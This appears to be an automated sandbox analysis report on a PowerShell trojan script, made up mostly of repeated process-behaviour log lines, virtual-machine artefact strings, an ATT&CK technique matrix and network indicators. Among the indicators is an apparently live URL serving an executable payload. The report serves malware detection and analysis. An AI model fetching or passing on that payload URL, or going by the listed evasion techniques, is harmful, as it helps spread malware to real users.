Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4182Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5667Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -13835058055282155s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: Amcache.hve.5.drBinary or memory string: VMware
Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.drBinary or memory string: vmci.sys
Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.drBinary or memory string: VMware20,1
Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
Source: powershell.exe, 00000000.00000002.1520434091.000001F9E5BBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWeP
Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
21
Virtualization/Sandbox Evasion
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Software Packing
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
untrippingvT.ps126%ReversingLabsWin32.Trojan.Boxter
untrippingvT.ps1100%AviraTR/PSploit.G1
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://www.italialife24.it0%Avira URL Cloudsafe
https://www.italialife24.it/wp-content/uploads/2021/05/hypervitalizationVA.exe0%Avira URL Cloudsafe
http://www.italialife24.it0%Avira URL Cloudsafe
http://italialife24.it0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
italialife24.it
46.254.34.201
truetrue
    unknown
    s-part-0035.t-0009.t-msedge.net
    13.107.246.63
    truefalse
      high
      www.italialife24.it
      unknown
      unknownfalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://www.italialife24.it/wp-content/uploads/2021/05/hypervitalizationVA.exetrue
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://www.italialife24.itpowershell.exe, 00000000.00000002.1496224082.000001F9CECFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1496224082.000001F9CD9D9000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1514275435.000001F9DD823000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1496224082.000001F9CF16D000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.1496224082.000001F9CEE96000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://crl.micropowershell.exe, 00000000.00000002.1520434091.000001F9E5C31000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1496224082.000001F9CD9D9000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1496224082.000001F9CD9D9000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://go.micropowershell.exe, 00000000.00000002.1496224082.000001F9CE2FE000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/powershell.exe, 00000000.00000002.1496224082.000001F9CF16D000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1514275435.000001F9DD823000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1496224082.000001F9CF16D000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Licensepowershell.exe, 00000000.00000002.1496224082.000001F9CF16D000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Iconpowershell.exe, 00000000.00000002.1496224082.000001F9CF16D000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://oneget.orgXpowershell.exe, 00000000.00000002.1496224082.000001F9CEE96000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://upx.sf.netAmcache.hve.5.drfalse
                                high
                                https://aka.ms/pscore68powershell.exe, 00000000.00000002.1496224082.000001F9CD7B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1496224082.000001F9CD7B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1496224082.000001F9CD9D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://oneget.orgpowershell.exe, 00000000.00000002.1496224082.000001F9CEE96000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
